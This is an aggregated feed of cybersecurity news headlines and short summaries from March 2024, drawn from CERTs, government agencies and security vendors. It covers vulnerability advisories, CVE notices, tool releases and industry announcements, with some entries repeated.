UK calls out China state-affiliated actors for malicious cyber targeting of UK democratic institutions and parliamentarians
2024-03-25T16:01:00Z | 1711382460

APT31, a China state-affiliated actor, was almost certainly responsible for targeting UK parliamentarians’ emails in 2021.

https://www.ncsc.gov.uk/news/china-state-affiliated-actors-target-uk-democratic-institutions-parliamentarians
The New AI Era: Networking for AI and AI for Networking*
2024-03-25T16:00:00Z | 1711382400

As we all recover from NVIDIA’s exhilarating GTC 2024 in San Jose last week, AI state-of-the-art news seems fast and furious. Nvidia’s latest Blackwell GPU announcement and Meta’s blog validating Ethernet for their pair of clusters with 24,000 GPUs to train on their Llama 3 large language model (LLM) made the headlines. Networking has come a long way, accelerating pervasive compute, storage, and AI workloads for the next era of AI. Our large customers across every market segment, as well as the cloud and AI titans, recognize the rapid improvements in productivity and unprecedented insights and knowledge that AI enables. At the heart of many of these AI clusters is the flagship Arista 7800R AI spine.

https://blogs.arista.com/blog/new-ai-era
Kicking off your quantum migration program
2024-03-25T10:28:00Z | 1711362480

Quantum computers will have sufficient computing power to break many of the most commonly used forms of cryptography between 2030 and 2040, experts estimate. Organizations should act now and prepare to make the switch to quantum-secure cryptography. The AIVD and the NCSC have therefore created this guidance document for CIOs, CTOs and CISOs in government, industry and knowledge institutions.

https://english.ncsc.nl/latest/news/2024/march/25/make-your-organization-quantum-secure
Security Alert (A24-03-18): Multiple Vulnerabilities in Microsoft Edge
2024-03-25T04:00:00Z | 1711339200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-19): Multiple Vulnerabilities in Firefox
2024-03-25T04:00:00Z | 1711339200

Mozilla has published the advisories (MFSA2024-15 and MFSA2024-16) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Noname Security Platform Updates: 3.28 Release
2024-03-23T02:37:00Z | 1711161420

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-328-release
Why fuzzing over formal verification?
2024-03-22T13:00:28Z | 1711112428

We recently introduced our new offering, invariant development as a service. A recurring question that we are asked is, “Why fuzzing instead of formal verification?” And the answer is, “It’s complicated.” We use fuzzing for most of our audits but have used formal verification methods in the […]

https://blog.trailofbits.com/2024/03/22/why-fuzzing-over-formal-verification/
The Akamai Foundation Continues to Give Back and Amplify Impact
2024-03-22T13:00:00Z | 1711112400

https://www.akamai.com/blog/culture/2024/mar/the-akamai-foundation-continues-to-give-back
Distributed Cloud and Edge Computing: A Cheat Sheet for IT Leaders
2024-03-22T13:00:00Z | 1711112400

https://www.akamai.com/blog/cloud/2024/mar/distributed-cloud-edge-computing-cheat-sheet-it-leaders
Cyber weather for February 2024
2024-03-22T11:14:36Z | 1711106076

The prevailing cyber weather in February was rainy. Microsoft 365 account breaches continued in February as well. Hacktivists also continued their denial-of-service attacks, when a large number of Finnish organisations were targeted by denial-of-service attacks at the beginning of the month

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_02/2024
Cyber weather for February 2024
2024-03-22T11:14:36Z | 1711106076

The prevailing cyber weather in February was rainy. Microsoft 365 account breaches continued in February as well. Hacktivists also continued their denial-of-service attacks, when a large number of Finnish organisations were targeted by denial-of-service attacks at the beginning of the month

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_02/2024
Akamai Customer Trust Built on Partnership and Best User Experience
2024-03-21T13:00:00Z | 1711026000

https://www.akamai.com/blog/performance/2024/mar/akamai-customer-trust-built-on-partnership-best-user-experience
Cato Networks Named 2024 Enterprise Firewall LEADER
2024-03-21T11:48:35Z | 1711021715

The post Cato Networks Named 2024 Enterprise Firewall LEADER appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-named-2024-enterprise-firewall-leader-by-gigaom/
Vulnerabilities in CDeX software
2024-03-21T11:00:00Z | 1711018800

CERT Poland has received a report about three vulnerabilities (from CVE-2024-2463 to CVE-2024-2465) found in CDeX software.

https://cert.pl/en/posts/2024/03/CVE-2024-2463/
Eesti riikliku mobiilirakenduse arendustöid teeb Net Group
2024-03-21T07:35:24Z | 1711006524

Äri- ja tarkvaraettevõte Net Group hakkab Riigi Infosüsteemi Ameti (RIA) tellimusel teostama riikliku mobiilirakenduse täiendavaid arendustöid, et tuua avalikud teenused kasutajale mobiiltelefoni.

https://ria.ee/uudised/eesti-riikliku-mobiilirakenduse-arendustoid-teeb-net-group
Abusing the DHCP Administrators Group to Escalate Privileges in Windows Domains
2024-03-20T14:00:00Z | 1710943200

https://www.akamai.com/blog/security-research/2024/feb/abusing-dhcp-administrators-group-for-privilege-escalation-in-windows-domains
Streamline your static analysis triage with SARIF Explorer
2024-03-20T13:30:45Z | 1710941445

Today, we’re releasing SARIF Explorer, the VSCode extension that we developed to streamline how we triage static analysis results. We make heavy use of static analysis tools during our audits, but the process of triaging them was always a pain. We designed SARIF Explorer to provide an intuitive UI inside VSCode, with […]

https://blog.trailofbits.com/2024/03/20/streamline-the-static-analysis-triage-process-with-sarif-explorer/
Security Alert (A24-03-16): Multiple Vulnerabilities in Google Chrome
2024-03-20T04:00:00Z | 1710907200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-17): Multiple Vulnerabilities in Firefox
2024-03-20T04:00:00Z | 1710907200

Mozilla has published the advisories (MFSA2024-12 and MFSA2024-13) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Top 5 Situational Risks for Identity-Based Attacks by Vectra AI Product Team
2024-03-20T00:00:00Z | 1710892800

With full context into incidents and knowledge of attacker behavior, Vectra AI ITDR ensures a 360-degree view of identity-based attacks.

https://www.vectra.ai/blog/top-5-situational-risks-for-identity-based-attacks
Vectra AI Publishes Automated Response Integrations Framework on GitHub by Justin Howe
2024-03-20T00:00:00Z | 1710892800

Technology integrations are the heart of the modern SOC.

https://www.vectra.ai/blog/vectra-publishes-automated-response-integrations-framework-on-github
The National Cyber Security Centre Finland’s weekly review – 11/2024
2024-03-19T14:05:21Z | 1710857121

Microsoft 365 account hijacking is on the rise again. This time, criminals are phishing for credentials under the name of Dropbox. Multi-factor authentication is an effective way of defending against phishing.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-112024
The National Cyber Security Centre Finland’s weekly review – 11/2024
2024-03-19T14:05:21Z | 1710857121

Microsoft 365 account hijacking is on the rise again. This time, criminals are phishing for credentials under the name of Dropbox. Multi-factor authentication is an effective way of defending against phishing.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-112024
Making desync attacks easy with TRACE
2024-03-19T14:00:00Z | 1710856800

Have you ever found an HTTP desync vulnerability that seemed impossible to exploit due to its complicated constraints? In this blogpost we will explore a new exploitation technique that can be used to

https://portswigger.net/research/trace-desync-attack
Read code like a pro with our weAudit VSCode extension
2024-03-19T13:30:00Z | 1710855000

Today, we’re releasing weAudit, the collaborative code-reviewing tool that we use during our security audits. With weAudit, we review code more efficiently by taking notes and tracking bugs in a codebase directly inside VSCode, reducing our reliance on external tools, ensuring we never lose track of bugs we find, and enabling us […]

https://blog.trailofbits.com/2024/03/19/read-code-like-a-pro-with-our-weaudit-vscode-extension/
Lurking in the Shadows: Attack Trends Shine Light on API Threats
2024-03-19T13:00:00Z | 1710853200

https://www.akamai.com/blog/security-research/attack-trends-shine-light-on-api-threats
Vectra AI Platform Adds Unique Detections, Automated Identity Lockdown, Enhanced User Management by Vectra AI Product Team
2024-03-19T00:00:00Z | 1710806400

Discover the latest Vectra AI Platform functionality and the additional capabilities that will soon be released in the RUX platform.

https://www.vectra.ai/blog/vectra-ai-platform-and-auto-lockdown-automated-response-controls-to-shut-down-attackers
Graylog Appoints Ross Brewer as Vice President and Managing Director EMEA to Support its Strong International Growth
2024-03-18T20:13:57Z | 1710792837

HAMBURG and HOUSTON, 18 March, 2024 – Graylog, an award-winning Threat Detection & Incident Response solutions provider, has today announced Ross Brewer’s appointment as Vice President and Managing Director in EMEA, based in the company’s London office. This strategic executive appointment will help the Hamburg-born company build upon its strong momentum across the EMEA region.     […] The post Graylog Appoints Ross Brewer as Vice President and Managing Director EMEA to Support its Strong International Growth appeared first on Graylog.

https://graylog.org/news/ross-brewer-vice-president/
Do More With Less Using Cloud-Based Security
2024-03-18T15:55:07Z | 1710777307

How a single view of security is changing video security and access control The post Do More With Less Using Cloud-Based Security appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/03/do-more-with-less-using-cloud-based-security/
Traficom recognises cooperation for preventing scam calls and messages with the Information Security Trailblazer award
2024-03-18T13:35:19Z | 1710768919

Traficom awarded the 2024 Information Security Trailblazer award to the parties who have taken part in planning and implementing measures for preventing international scam calls and messages in Finland. As a result of this cooperation, scam calls from spoofed Finnish phone numbers have all but stopped. With scam calls and messages being a global problem, the Finnish know-how and pioneering measures implemented to tackle the problem are also garnering international interest.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-recognises-cooperation-preventing-scam-calls-and-messages-information-security
Traficom recognises cooperation for preventing scam calls and messages with the Information Security Trailblazer award
2024-03-18T13:35:19Z | 1710768919

Traficom awarded the 2024 Information Security Trailblazer award to the parties who have taken part in planning and implementing measures for preventing international scam calls and messages in Finland. As a result of this cooperation, scam calls from spoofed Finnish phone numbers have all but stopped. With scam calls and messages being a global problem, the Finnish know-how and pioneering measures implemented to tackle the problem are also garnering international interest.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-recognises-cooperation-preventing-scam-calls-and-messages-information-security
Releasing the Attacknet: A new tool for finding bugs in blockchain nodes using chaos testing
2024-03-18T13:00:59Z | 1710766859

Today, Trail of Bits is publishing Attacknet, a new tool that addresses the limitations of traditional runtime verification tools, built in collaboration with the Ethereum Foundation. Attacknet is intended to augment the EF’s current test methods by subjecting their execution and consensus clients to some of the most challenging network conditions […]

https://blog.trailofbits.com/2024/03/18/releasing-the-attacknet-a-new-tool-for-finding-bugs-in-blockchain-nodes-using-chaos-testing/
Recognizing Progress and Living Our Values: Akamai?s 2023 ESG Impact Report
2024-03-18T13:00:00Z | 1710766800

https://www.akamai.com/blog/sustainability/2024/mar/akamai-2023-esg-impact-report
RIA viib läbi toimepidevuse testi
2024-03-18T12:01:47Z | 1710763307

Riigi Infosüsteemi Amet viib kolmapäeva, 20. märtsi öösel vastu neljapäeva, 21. märtsi läbi toimepidevuse testi, mille jooksul võib esineda lühiajalisi häireid riigivõrgu andmesideteenuste töös.

https://ria.ee/uudised/ria-viib-labi-toimepidevuse-testi
CVE-2024-0860
2024-03-18T11:25:00Z | 1710761100

CWE-319: CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests. Softing edgeConnector: Version 3.60 and Softing edgeAggregator: Version 3.60 are affected. Update Softing edgeConnector and edgeAggregator to v3.70 or greater.

https://claroty.com/team82/disclosure-dashboard/cve-2024-0860
Vulnerabilities in BMC Control-M software
2024-03-18T11:00:00Z | 1710759600

CERT Poland has received a report about three vulnerabilities (from CVE-2024-1604 to CVE-2024-1606) found in BMC Control-M software.

https://cert.pl/en/posts/2024/03/CVE-2024-1604/
CVE-2024-27771
2024-03-18T10:23:00Z | 1710757380

CWE-22: 'Path traversal' Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. Read More: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered

https://claroty.com/team82/disclosure-dashboard/cve-2024-27771
CVE-2024-27770
2024-03-18T10:23:00Z | 1710757380

CWE-23: Relative Path Traversal Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. [Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.]

https://claroty.com/team82/disclosure-dashboard/cve-2024-27770
CVE-2024-27769
2024-03-18T10:23:00Z | 1710757380

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Update ASAP to version 1.35.227 or latest version provided by Unitronics. [Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.]

https://claroty.com/team82/disclosure-dashboard/cve-2024-27769
CVE-2024-27774
2024-03-18T10:22:00Z | 1710757320

CWE-259: Use of Hard-coded Password: Sensitive Information Embedded inside Devices Firmware Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. Read More: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered

https://claroty.com/team82/disclosure-dashboard/cve-2024-27774
CVE-2024-27773
2024-03-18T10:22:00Z | 1710757320

CWE-78: 'OS Command Injection' Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. [Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.]

https://claroty.com/team82/disclosure-dashboard/cve-2024-27773
CVE-2024-27772
2024-03-18T10:22:00Z | 1710757320

CWE-78: 'OS Command Injection' Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. [Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.]

https://claroty.com/team82/disclosure-dashboard/cve-2024-27772
CVE-2024-27768
2024-03-18T10:22:00Z | 1710757320

CWE-22: Path Traversal Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities, including this remote code execution vulnerability. [Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.]

https://claroty.com/team82/disclosure-dashboard/cve-2024-27768
CVE-2024-27767
2024-03-18T10:21:00Z | 1710757260

CWE-287: Improper Authentication Unitronics released an update to its Unistream Unilogic software, fixing multiple security vulnerabilities. Versions affected are earlier than 1.35.227. Update ASAP to version 1.35.227 or latest version provided by Unitronics. Read more: New Critical Vulnerabilities in Unitronics UniStream Devices Uncovered.

https://claroty.com/team82/disclosure-dashboard/cve-2024-27767
Benchmarking the Security Capabilities of Large Language Models
2024-03-18T10:00:43Z | 1710756043

Comparative Sophos X-Ops testing not only indicates which models fare best in cybersecurity, but where cybersecurity fares best in AI

https://news.sophos.com/en-us/2024/03/18/benchmarking-the-security-capabilities-of-large-language-models/
10 Signs You're Asking Too Much from Your SIEM by Vectra AI Product Team
2024-03-18T00:00:00Z | 1710720000

The Vectra AI Platform dramatically increases your SIEM performance with analytics-led detection, saving you time and money.

https://www.vectra.ai/blog/10-signs-youre-asking-too-much-from-your-siem
Cato SASE Cloud Platform: SASE Elegance at Its Best
2024-03-17T10:14:42Z | 1710670482

The post Cato SASE Cloud Platform: SASE Elegance at Its Best  appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sase-cloud-platform-sase-elegance-at-its-best/
Küberkiirendisse oodatakse uusi idufirmasid
2024-03-15T07:44:47Z | 1710488687

Tehnopol Startup Inkubaator ja Riigi Infosüsteemi Amet (RIA) kutsuvad Küberkiirendi uude vooru kandideerima küberturvalisuse valdkonna idufirmasid, kel on võimalik saada oma ideede arendamiseks nõu valdkonna parimatelt mentoritelt ja 48 000 eurot toetust.

https://ria.ee/uudised/kuberkiirendisse-oodatakse-uusi-idufirmasid
The National Cyber Security Centre Finland’s weekly review – 10/2024
2024-03-15T07:27:28Z | 1710487648

Have you also received a text message that tries to scare you with the consequences of traffic violations? A lot of them have been popping up recently. There are also scams using the name of the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-102024
The National Cyber Security Centre Finland’s weekly review – 10/2024
2024-03-15T07:27:28Z | 1710487648

Have you also received a text message that tries to scare you with the consequences of traffic violations? A lot of them have been popping up recently. There are also scams using the name of the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-102024
Security Alert (A24-03-15): Multiple Vulnerabilities in Microsoft Edge
2024-03-15T04:00:00Z | 1710475200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Perspective on March?s Patch Tuesday 2024
2024-03-14T18:00:00Z | 1710439200

Don?t let your pies burn while you read patch notes. March?s 2024?s Patch Tuesday has 60 total CVE, with two critical in Hyper-V.

https://www.akamai.com/blog/security-research/2024/mar/akamai-perspective-patch-tuesday-march-2024
Cyber Strategy: Don?t Focus on Prevention ? Master Resilience
2024-03-14T13:00:00Z | 1710421200

https://www.akamai.com/blog/security/2024/mar/dont-focus-on-prevention-master-resilience
National cybersecurity exercise “Medus Pods 2024” concluded
2024-03-14T11:40:52Z | 1710416452

The annual National Cyber Security Exercise “Medus pods” was held in February to enhance capabilities to respond to cyber threats, identify needed improvements, and promote civil-military cooperation in cyber defense of national critical infrastructure.

https://cert.lv/en/2024/03/national-cybersecurity-exercise-medus-pods-2024-concluded
Security Alert (A24-03-13): Multiple Vulnerabilities in Apache Tomcat
2024-03-14T04:00:00Z | 1710388800

The Apache Software Foundation released security updates to address multiple vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-14): Multiple Vulnerabilities in Cisco IOS XR Software
2024-03-14T04:00:00Z | 1710388800

Cisco released security advisories to address multiple vulnerabilities in Cisco IOS XR Software.

https://www.govcert.gov.hk/en/alerts_detail.php
New Extended Detection and Response (XDR) Capabilities Recently Added to the Vectra AI Platform by Mark Wojtasiak
2024-03-14T00:00:00Z | 1710374400

Recent enhancements to the Vectra AI Platform include added detection coverage, the industry's first global open MXDR service and key investigation and response controls.

https://www.vectra.ai/blog/new-extended-detection-and-response-xdr-capabilities-recently-added-to-the-vectra-ai-platform
What a Cluster: Local Volumes Vulnerability in Kubernetes
2024-03-13T14:00:00Z | 1710338400

https://www.akamai.com/blog/security-research/2024/mar/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges
Secure your blockchain project from the start
2024-03-13T13:00:45Z | 1710334845

Systemic security issues in blockchain projects often appear early in development. Without an initial focus on security, projects may choose flawed architectures or make insecure design or development choices that result in hard-to-maintain or vulnerable solutions. Traditional security reviews can be used to identify some security issues, but by the time they are complete, it […]

https://blog.trailofbits.com/2024/03/13/secure-your-blockchain-project-from-the-start/
Discover the 3 Trends Driving API Security Compliance
2024-03-13T13:00:00Z | 1710334800

https://www.akamai.com/blog/security/2024/mar/3-trends-driving-api-security-compliance
High Threat Security Alert (A24-03-09): Multiple Vulnerabilities in Microsoft Products (March 2024)
2024-03-13T04:00:00Z | 1710302400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-03-10): Multiple Vulnerabilities in Fortinet Products
2024-03-13T04:00:00Z | 1710302400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-11): Vulnerability in Google Chrome
2024-03-13T04:00:00Z | 1710302400

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-12): Multiple Vulnerabilities in SonicWall Products
2024-03-13T04:00:00Z | 1710302400

SonicWall released security advisories to address multiple vulnerabilities in SonicWall products.

https://www.govcert.gov.hk/en/alerts_detail.php
Where are they now? Starring: Atlassian's Confluence CVE-2023-22527
2024-03-13T00:00:00Z | 1710288000

Despite rumors to the contrary, CVE-2023-22527 isn’t dead! See what it’s been up to in the weeks since it was all the rage.

https://www.greynoise.io/blog/where-are-they-now-starring-atlassians-confluence-cve-2023-22527
SonicWall Email Security Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) Vulnerability
2024-03-12T23:34:23Z | 1710286463

An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and delete arbitrary files from the appliance file system. CVE: CVE-2024-22398 Last updated: March 12, 2024, 11:34 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0006
SonicOS SSLVPN Portal Stored Cross-site Scripting Vulnerability
2024-03-12T23:18:47Z | 1710285527

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in the SonicOS SSLVPN portal allows a remote authenticated attacker as a firewall 'admin' user to store and execute arbitrary JavaScript code. This vulnerability affects only SonicOS Gen7 firmware 7.0.1-5145, 7.1.1-7047 and earlier versions. CVE: CVE-2024-22397 Last updated: March 12, 2024, 11:18 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005
Integer-Based Buffer Overflow Vulnerability In SonicOS via IPSec
2024-03-12T23:11:23Z | 1710285083

A Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall. CVE: CVE-2024-22396 Last updated: March 12, 2024, 11:11 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0004
iboss Named Gold Winner in the 20th Annual Globee Awards for Cybersecurity
2024-03-12T16:33:07Z | 1710261187

iboss, the expert in cloud-delivered cybersecurity, has recently launched its innovative ChatGPT Risk Module. This advanced addition to its Zero Trust Security Service Edge (SSE) solution is specifically designed to monitor and secure user interactions with ChatGPT, a leading artificial intelligence technology. This innovative initiative is aimed at ensuring exceptional data security and compliance in dynamic digital environments. The post iboss Named Gold Winner in the 20th Annual Globee Awards for Cybersecurity appeared first on iboss.

https://www.iboss.com/news/iboss-named-gold-winner-in-the-20th-annual-globee-awards-for-cybersecurity/
RIA ja Cybernetica aitavad Eesti ettevõtetel tehisintellekti turvaliselt rakendada
2024-03-12T07:09:20Z | 1710227360

Tehisintellekti süsteemide üha laiema leviku tõttu on Riigi Infosüsteemi Ameti (RIA) hinnangul vaja eraldi tähelepanu pöörata nende küberturvalisusele. Et toetada Eesti ettevõtete ja asutuste arenguplaane, pani Cybernetica AS RIA tellimusel kokku analüüsi AI tehnoloogia riskidest ja nende leevendamise võimalustest, millega tasub tutvuda kõigil, kes kavatsevad tehisaru kasutusele võtta.

https://ria.ee/uudised/ria-ja-cybernetica-aitavad-eesti-ettevotetel-tehisintellekti-turvaliselt-rakendada
Akamai Security Solutions ? Everywhere Your Business Meets the World
2024-03-12T06:00:00Z | 1710223200

https://www.akamai.com/blog/security/2024/mar/akamai-security-solutions
DARPA awards $1 million to Trail of Bits for AI Cyber Challenge
2024-03-11T17:46:31Z | 1710179191

We’re excited to share that Trail of Bits has been selected as one of the seven exclusive teams to participate in the small business track for DARPA’s AI Cyber Challenge (AIxCC). Our team will receive a $1 million award to create a Cyber Reasoning System (CRS) and compete in the AIxCC […]

https://blog.trailofbits.com/2024/03/11/darpa-awards-1-million-to-trail-of-bits-for-ai-cyber-challenge/
State of the Cloud: Where We Are and Where We?re Heading
2024-03-11T13:00:00Z | 1710162000

https://www.akamai.com/blog/cloud/2024/mar/state-of-the-cloud-where-we-are-where-were-heading
Euroopa Parlamendi otsus võimaldab digikukru arendamisega edasi liikuda
2024-03-11T09:20:51Z | 1710148851

Euroopa Parlament kiitis heaks ELi digitaalse identiteedi raamistiku loomise, mis on oluline verstapost ELi teekonnal turvalisema ja ligipääsetavama digimaastiku suunas. See võimaldab POTENTIAL konsortsiumil kiirendada oma suuremahulist pilootprojekti, mille eesmärk on katsetada Euroopa digikukrut (EUDI Wallet). Kõik liikmesriigid, sealhulgas pilootprojektis osalevad 19 riiki ja Ukraina, on võtnud kohustuse luua oma digikukkur 24 kuu jooksul pärast rakendusaktide jõustumist.

https://ria.ee/uudised/euroopa-parlamendi-otsus-voimaldab-digikukru-arendamisega-edasi-liikuda
Evasive Phishing Kits Exposed: Cato Networks’ In-Depth Analysis and Real-Time Defense
2024-03-11T08:00:00Z | 1710144000

Phishing remains an ever persistent and grave threat to organizations, serving as the primary conduit for infiltrating network infrastructures and pilfering valuable credentials. According to an FBI report phishing is ranked number 1 in the top five Internet crime types. Recently, the Cato Networks Threat Research team analyzed and mitigated through our IPS engine multiple... The post Evasive Phishing Kits Exposed: Cato Networks’ In-Depth Analysis and Real-Time Defense appeared first on Cato Networks.

https://www.catonetworks.com/blog/evasive-phishing-kits-exposed-cato-networks-in-depth-analysis-and-real-time-defense/
Security Alert (A24-03-08): Multiple Vulnerabilities in QNAP Products
2024-03-11T04:00:00Z | 1710129600

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
8 Questions Security Pros Ask Vectra AI About Midnight Blizzard Threat Detection by Vectra AI Security Research team
2024-03-11T00:00:00Z | 1710115200

https://www.vectra.ai/blog/8-questions-security-pros-ask-vectra-ai-about-midnight-blizzard-threat-detection
Out of the kernel, into the tokens
2024-03-08T14:00:48Z | 1709906448

We’re digging up the archives of vulnerabilities that Trail of Bits has reported over the years. This post shares the story of two such issues: a denial-of-service (DoS) vulnerability hidden in JSON Web Tokens (JWTs), and an oversight in the Linux kernel that could enable circumvention of critical kernel […]

https://blog.trailofbits.com/2024/03/08/out-of-the-kernel-into-the-tokens/
AkaNAT: How Akamai Uses Machine Learning to Detect Shared IPs
2024-03-08T14:00:00Z | 1709906400

https://www.akamai.com/blog/security/2024/mar/how-akamai-uses-machine-learning-to-detect-shared-ips
Elevate Your Web Monitoring Experience with Managed Web Monitoring
2024-03-08T14:00:00Z | 1709906400

https://www.akamai.com/blog/edge/2024/mar/elevate-your-web-monitoring-experience-with-managed-web-monitoring
Veebruaris toimus Eestis kaks suuremat pahavara- ja õngitsuskirjade lainet
2024-03-08T08:33:00Z | 1709886780

Riigi Infosüsteemi Ameti (RIA) kuukokkuvõttest selgub, et veebruaris saadeti ettevõtete nimel kahe suure lainena õngitsus- ja pahavaraga kirju ning mitu riigiasutust pidid tegelema tehniliste probleemide ja küberrünnetega, mis häirisid kohati ka e-teenuste tööd.

https://ria.ee/uudised/veebruaris-toimus-eestis-kaks-suuremat-pahavara-ja-ongitsuskirjade-lainet
Security Alert (A24-03-07): Multiple Vulnerabilities in Microsoft Edge
2024-03-08T04:00:00Z | 1709870400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Hunting for Fortinet's CVE-2024-21762
2024-03-08T00:00:00Z | 1709856000

This post steps through the process of discovering CVE-2024-21762, a non-disclosed out-of-bounds write vulnerability in Fortinet FortiOS and FortiProxy

https://www.greynoise.io/blog/hunting-for-fortinets-cve-2024-21762
Enhance Customers? Security Posture: Akamai SOCC Advanced Service
2024-03-07T14:00:00Z | 1709820000

https://www.akamai.com/blog/security/2024/mar/akamai-socc-advanced-service
BBVA and Cisco Strengthen its Strategic Partnership to Accelerate Digital Transformation and Foster Innovation
2024-03-07T09:00:00Z | 1709802000

The global financial services group Banco Bilbao Vizcaya Argentaria, S.A. (BBVA) signs a Strategic Whole Portfolio Agreement with Cisco.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m03/bbva-and-cisco-strengthen-its-strategic-partnership-to-accelerate-digital-transformation-and-foster-innovation.html
Security Alert (A24-03-06): Multiple Vulnerabilities in Cisco Products
2024-03-07T04:00:00Z | 1709784000

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer overflow vulnerability
2024-03-07T00:00:00Z | 1709769600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1887
Lessons on Cybersecurity from Formula E
2024-03-06T17:00:07Z | 1709744407

The ABB FIA Formula E World Championship is an exciting evolution of motorsports, having launched its first season of single-seater all-electric racing in 2014. The first-generation cars featured a humble 200kW of power but as technology has progressed, the current season Gen3 cars now have 350kW. Season 10 is currently in progress with 16 global... The post Lessons on Cybersecurity from Formula E appeared first on Cato Networks.

https://www.catonetworks.com/blog/lessons-on-cybersecurity-from-formula-e/
Navigating Ivanti Vulnerabilities: A Proactive Approach for Enterprise Security
2024-03-06T15:18:19Z | 1709738299

The recent advisories and alerts issued by the Cybersecurity and Infrastructure Security Agency (CISA) concerning vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure devices have stirred the cybersecurity community. These vulnerabilities pose a substantial risk to organizations, with CISA explicitly stating, "Continuing to operate Ivanti Connect Secure and Ivanti Policy Secure devices in an enterprise environment carries significant risk of adversary access to and persistence on these devices." The post Navigating Ivanti Vulnerabilities: A Proactive Approach for Enterprise Security appeared first on iboss.

https://www.iboss.com/blog/navigating-ivanti-vulnerabilities/
Leaking NTLM Credentials Through Windows Themes
2024-03-06T15:00:00Z | 1709737200

https://www.akamai.com/blog/security-research/2024/mar/leaking-ntlm-credentials-through-windows-themes
High Threat Security Alert (A24-03-03): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-03-06T04:00:00Z | 1709697600

Apple has released iOS 16.7.6, iOS 17.4, iPadOS 16.7.6 and iPadOS 17.4 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-03-04): Multiple Vulnerabilities in VMware Products
2024-03-06T04:00:00Z | 1709697600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-05): Multiple Vulnerabilities in Google Chrome
2024-03-06T04:00:00Z | 1709697600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
NetKiller.Condi Botnet Exploits CVE-2024-0778 One Week After Disclosure
